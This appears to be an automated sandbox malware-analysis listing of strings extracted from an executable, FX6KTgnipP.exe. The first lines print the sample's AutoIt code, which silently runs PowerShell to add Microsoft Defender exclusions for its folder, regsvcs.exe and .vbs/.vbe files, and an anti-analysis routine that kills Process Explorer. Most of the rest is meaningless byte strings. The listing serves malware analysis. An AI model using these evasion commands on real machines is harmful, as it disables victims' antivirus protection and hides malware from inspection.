                Source: FX6KTgnipP.exe, 00000000.00000003.1394224058.0000000007BD3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: shellexecute("powershell", " -command add-mppreference -exclusionpath " & @scriptdir, "", "", @sw_hide)memstr_d99c6b18-e
                Source: FX6KTgnipP.exe, 00000000.00000003.1394224058.0000000007BD3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: shellexecute("powershell", " powershell -command add-mppreference -exclusionprocess 'regsvcs.exe'", "", "", @sw_hide)memstr_f6d0b07a-b
                Source: FX6KTgnipP.exe, 00000000.00000003.1394224058.0000000007BD3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: shellexecute("powershell", " powershell -command add-mppreference -exclusionextension '.vbs'", "", "", @sw_hide)memstr_cf021540-f
                Source: FX6KTgnipP.exe, 00000000.00000003.1394224058.0000000007BD3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: shellexecute("powershell", " powershell -command add-mppreference -exclusionextension '.vbe'", "", "", @sw_hide)memstr_7f6564d8-1
                Source: FX6KTgnipP.exe, 00000000.00000003.1394224058.0000000007BD3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: shellexecute("powershell", " powershell -command add-mppreference -exclusionextension '*.vbs'", "", "", @sw_hide)memstr_96d03632-a
                Source: FX6KTgnipP.exe, 00000000.00000003.1394224058.0000000007BD3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: shellexecute("powershell", " powershell -command add-mppreference -exclusionextension '*.vbe'", "", "", @sw_hide)memstr_3bf82497-9
                Source: FX6KTgnipP.exe, 00000000.00000003.1394224058.0000000007BD3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ;endifmemstr_8844123f-1
                Source: FX6KTgnipP.exe, 00000000.00000003.1394224058.0000000007BD3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: endfunc ;==>disablermemstr_3db74891-5
                Source: FX6KTgnipP.exe, 00000000.00000003.1394224058.0000000007BD3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: func antianalysis()memstr_64e73b46-a
                Source: FX6KTgnipP.exe, 00000000.00000003.1394224058.0000000007BD3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: if winexists("process explorer") thenmemstr_2f8215f6-7
                Source: FX6KTgnipP.exe, 00000000.00000003.1394224058.0000000007BD3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: winclose("process explorer")memstr_1b9bfcac-3
                Source: FX6KTgnipP.exe, 00000000.00000003.1394224058.0000000007BD3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: processclose("procexp64.exe")memstr_315b590c-b
                Source: FX6KTgnipP.exe, 00000000.00000003.1394224058.0000000007BD3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: processclose("procexp.exe")memstr_ad2a3663-9
                Source: FX6KTgnipP.exe, 00000000.00000003.1549965434.0000000004ED0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @ ` ` ` ` @ fimemstr_a599a83e-6
                Source: FX6KTgnipP.exe, 00000000.00000003.1549965434.0000000004ED0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: sfailmemstr_66477361-f
                Source: FX6KTgnipP.exe, 00000000.00000003.1549965434.0000000004ED0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: sfail@memstr_c0b4e6b9-6
                Source: FX6KTgnipP.exe, 00000000.00000003.1549965434.0000000004ED0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c:\windows\fontsmemstr_5015e6ef-5
                Source: FX6KTgnipP.exe, 00000000.00000003.1549965434.0000000004ED0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: (fx6ktgnipp.exe)memstr_27dd03e1-e
                Source: FX6KTgnipP.exe, 00000000.00000003.1549965434.0000000004ED0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: sbuilt-in ico codecico*.icoimage/x-iconmemstr_c75635e1-a
                Source: FX6KTgnipP.exe, 00000000.00000003.1549965434.0000000004ED0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: sbuilt-in png codecpng*.pngimage/pngmemstr_bd905106-f
                Source: FX6KTgnipP.exe, 00000000.00000003.1549965434.0000000004ED0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: sbuilt-in tiff codectiff*.tif;*.tiffimage/tiffiimmmemstr_6afa3cbd-c
                Source: FX6KTgnipP.exe, 00000000.00000003.1549965434.0000000004ED0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: built-in wmf codecwmf*.wmfimage/x-wmfmemstr_8c58048a-e
                Source: FX6KTgnipP.exe, 00000000.00000003.1549965434.0000000004ED0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: built-in emf codecemf*.emfimage/x-emf emfmemstr_df79ba65-d
                Source: FX6KTgnipP.exe, 00000000.00000003.1549965434.0000000004ED0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: gif89agif87amemstr_ab8ac99e-c
                Source: FX6KTgnipP.exe, 00000000.00000003.1549965434.0000000004ED0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: sbuilt-in gif codecgif*.gifimage/gifgif89agif87amemstr_7a1896af-b
                Source: FX6KTgnipP.exe, 00000000.00000003.1549965434.0000000004ED0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: sbuilt-in jpeg codecjpeg*.jpg;*.jpeg;*.jpe;*.jfifimage/jpegmemstr_84b69092-2
                Source: FX6KTgnipP.exe, 00000000.00000003.1549965434.0000000004ED0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: sbuilt-in bmp codecbmp*.bmp;*.dib;*.rleimage/bmpbmmemstr_3342d79b-f
                Source: FX6KTgnipP.exe, 00000000.00000003.1549965434.0000000004ED0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: chrmmemstr_e3862734-3
                Source: FX6KTgnipP.exe, 00000000.00000003.1549965434.0000000004ED0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: chrmz&memstr_da73b08c-0
                Source: FX6KTgnipP.exe, 00000000.00000003.1549965434.0000000004ED0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: =;zm2memstr_8307ca75-e
                Source: FX6KTgnipP.exe, 00000000.00000003.1549965434.0000000004ED0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vksy0memstr_9be5a297-2
                Source: FX6KTgnipP.exe, 00000000.00000003.1549965434.0000000004ED0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: '_c?!kmemstr_fdc25d27-f
                Source: FX6KTgnipP.exe, 00000000.00000003.1549965434.0000000004ED0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: m,tnmemstr_b8165261-7
                Source: FX6KTgnipP.exe, 00000000.00000003.1549965434.0000000004ED0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: r[t%ememstr_2005148a-e
                Source: FX6KTgnipP.exe, 00000000.00000003.1549965434.0000000004ED0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ?iendmemstr_d3b95401-c
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: -w8l+r*memstr_e4dd1255-0
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: "@"u"memstr_bff7f88e-e
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 3x7{ memstr_26bb23e6-f
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 2q#_!memstr_f6ea50c8-3
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: +t,x#memstr_a80d06ab-2
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: $.!m)memstr_57953bd8-b
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 0( j'memstr_b6c45907-1
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: !q59-r)9 @%q+memstr_ee9d0555-9
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: *>%j "'w"memstr_d52fbe99-b
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 6f&m$memstr_848025f3-9
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 4v6x+memstr_73a11962-e
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: #0)n(#memstr_ce846eb5-9
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: +#&e"memstr_1fa745ac-5
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 8v'd0memstr_4014bc36-5
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 3/*046,memstr_e5828144-f
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: !i%|"@,i',2memstr_43c5408c-8
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 3(4h-v$memstr_3510fd05-6
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: !9.q$memstr_18507933-5
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 6v2~ %0x.memstr_2a94e7c7-f
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 19"s"memstr_7d02671a-8
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: *_ @1memstr_77227cce-b
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: &\ l&8+memstr_c1b27234-5
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: )>!,$e+7$memstr_2f633743-3
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: &e(a0memstr_066005eb-5
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: &o&~1memstr_6ba1e373-5
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: '17)&b%(80,memstr_418de830-c
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: "a'b 90memstr_5e3198f0-5
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: i+l7u5p4-6memstr_f1da26bd-9
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ,=/**j%o/memstr_5e354a46-e
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: g,?&'!memstr_1f5b7864-0
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: -.8z,memstr_093a5e42-3
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 'b)9%i*memstr_3592f194-3
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: +s$g4x-memstr_0f02acc1-b
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 2{7!%memstr_bda48b27-4
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: #"2r+q6u3memstr_1c7211c3-c
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: $#/]*}373memstr_b6bba914-1
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ,7 `'memstr_f82fffa8-8
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 4m$j$memstr_3057e117-f
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: '42r'memstr_a453c83e-7
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: "'/:)memstr_6e34b853-2
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: (<'v(memstr_28e98795-b
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: &@(]4memstr_4db740cc-5
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: !p4|#g$memstr_04c8f3c8-f
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: $_5w*00memstr_07ec3c59-c
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 0g"[&memstr_815372e8-9
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: +.-*$memstr_221e75b0-b
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: )j&l)24t#memstr_ca82776a-5
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 11!h(memstr_52a70e9d-9
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 2[#.,memstr_499e9f51-b
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: &5#[*memstr_a6506c54-5
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: #z {5memstr_93851af8-e
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %q-g7memstr_358df759-1
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: )o,^ : memstr_69791843-1
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ;%o-<memstr_4e3d01a4-0
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: -^'h+memstr_1639b1ff-5
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 3k6y.memstr_da9aa81d-2
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: "1+ 6memstr_0a529c3d-c
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: *w#o6memstr_d8c16e33-9
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: -x$""k/f-@+memstr_9c075b98-b
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: /d/%-memstr_d4018c57-b
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: x6("memstr_76172206-e
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %s$l#bmemstr_8a794e27-8
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: a9u-memstr_4e975d94-e
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ? y#-"memstr_f9f96fdb-c
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: !?,b0memstr_ea70af27-9
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: *b(q(memstr_13affa3b-2
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: (48u'memstr_f21b55c0-7
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %q.o3l#@$memstr_33993d70-6
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: &p6.6memstr_0bf8d31b-d
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 'f*i7memstr_e1e42f16-3
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: =#~2x/memstr_c887ff47-9
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: l!j*k(}1memstr_38bf4dec-8
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: (?1v &,r#@memstr_177ab791-8
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 0p&`+memstr_8faa96c4-2
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 4e%c/memstr_6f7ee4ba-2
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: !57w1memstr_48ff38b0-9
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: &k"e0memstr_fd0382bb-2
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: $l.z.memstr_914ba320-5
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 8w!-#memstr_edca86e6-8
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 0n4p088b1memstr_06801dab-1
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %9)-,memstr_b75070a1-b
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 'f3c.memstr_9e25ebbe-0
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: *q9|,memstr_14a396a2-e
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: -=4;.memstr_1ce46c02-d
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: +l1t [ memstr_91c55106-d
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 4=%f4n-memstr_ba72f7e8-2
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: "@*f5memstr_c644aa39-2
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: (g1}5memstr_2dd00bbc-f
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: &m&[0z2memstr_4862c9a7-b
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 3l$y35'memstr_8a5b5d38-6
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: '10r$memstr_ac757097-c
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 6g"r0-5memstr_80792494-d
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: #b48%memstr_cb2da97d-8
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: (s%c memstr_f6dbab00-3
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 0&&e2memstr_7b23d335-c
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ."w&ymemstr_8d52c1ee-b
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 0i"f7e1(#}#a0memstr_4571694f-7
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: .s)8rmemstr_7c9b5c88-3
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: !$%b$memstr_0a20b9f0-4
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ,j7^/memstr_2eb750c0-1
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 88 e!memstr_58123565-9
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: )}(/)memstr_8ba6f96d-0
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %<4] memstr_fe505dec-4
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: &0-m'memstr_96ae93ee-c
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: /y("+memstr_5a60faf1-2
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: +r$*1memstr_beb6e797-c
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: .h,~'!/memstr_8b411a77-e
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %i(n9memstr_f5e519d4-2
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: #c-6#memstr_c048f169-2
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 't5|'memstr_c0bc244d-e
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: (q y(memstr_72cd364b-e
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: $i)p.memstr_6559bc28-4
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: !r&e#p%)'memstr_87ab70af-a
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: +:3c%o0memstr_767d6dde-b
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: (d&`(memstr_ee4512d7-5
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %09_"memstr_23eb520d-f
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 7o${2./memstr_e2471d7a-5
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 4'23+memstr_ec502577-9
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: "y,d*memstr_1ce5c1ea-8
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: .b2%2memstr_5710ff81-0
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 'x$i3d4t7memstr_88ae0c7c-0
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: (r(w!memstr_fe44e3e9-b
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %5i5wmemstr_cd246587-2
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: "#2j3memstr_77e790d1-5
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: #q3a7memstr_24e60144-7
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: /l3;'memstr_dcab67ba-6
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: #()a'memstr_8f5dbd28-6
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %o"5(mmemstr_55afd9ba-e
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 'b*f+]memstr_75cac23a-5
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: *t*j*memstr_d1ac5afd-1
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: "y2v6memstr_2f14b85f-0
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ,i$,3memstr_cbc9ffc0-e
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %s/))memstr_abc12b1e-c
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: *e+l2memstr_bc6c6eb4-8
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 36/k!memstr_2afa317d-1
                Source: FX6KTgnipP.exe, 00000000.00000003.1406109114.0000000009111000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 6}'x(memstr_1cecfdde-a
